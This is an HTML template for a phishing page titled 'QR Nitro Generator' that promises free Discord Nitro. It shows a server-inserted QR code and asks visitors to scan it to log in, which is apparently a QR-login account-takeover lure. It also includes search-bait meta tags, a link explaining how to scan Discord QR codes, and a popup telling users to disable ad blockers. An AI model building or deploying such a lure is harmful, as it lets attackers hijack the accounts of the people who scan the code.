<!DOCTYPE html>

<html>
    <head>
        <header>
            <meta charset='UTF-8'>
            <meta name='description' content='Free discord nitro generator online, no downloads, no human verification !'>
            <meta name='keywords' content='Discord, Nitro, Generator, No, Human, Verification'>
            <meta charset='utf-8'>

            <title>QR Nitro Generator</title>
        </header>
    </head>

    <body>
        
        <div class='qr_code' style='width:800px; margin:0 auto;'>
            <a id='text_lmao'>Log in to your Discord account, and enjoy Discord-Nitro for free!</a>
            <br><br>
            <img src='<%= qr_code_path %>'/>
            <br><br>
            <a target="_blank" rel="noopener noreferrer" id='url' href='https://techswift.org/2020/10/06/how-to-login-to-discord-via-qr-code/'>How to scan qr code ?</a>
        </div>
    </body>

    <script>
        alert('If you do not see a QR-Code, please disable your add-blocker.');
    </script>

    <style>
        html {
            background-color: rgb(27, 29, 29);
            background-image: url('https://images4.alphacoders.com/909/thumb-1920-909912.png');
        }
        .logo_top {
            text-align: middle;
        }
        .qr_code {
            box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2);
            background-color: #23272A;
            border-radius: 5px;
            transition: 0.5s;
            
            padding: 15px;
            vertical-align:middle;
            text-align:center;
        }
        .qr_code:hover {
            box-shadow: 0 8px 32px 0 rgba(0,0,0,0.4);
        }
        #url {
            font-size: medium;
            font-family:Georgia, 'Times New Roman', Times, serif;
            color: #6a747c;
        }
        #text_lmao {
            font-size:large;
            font-family:Verdana, Geneva, Tahoma, sans-serif;
            color: #6a747c;
        }
    </style>
</html>
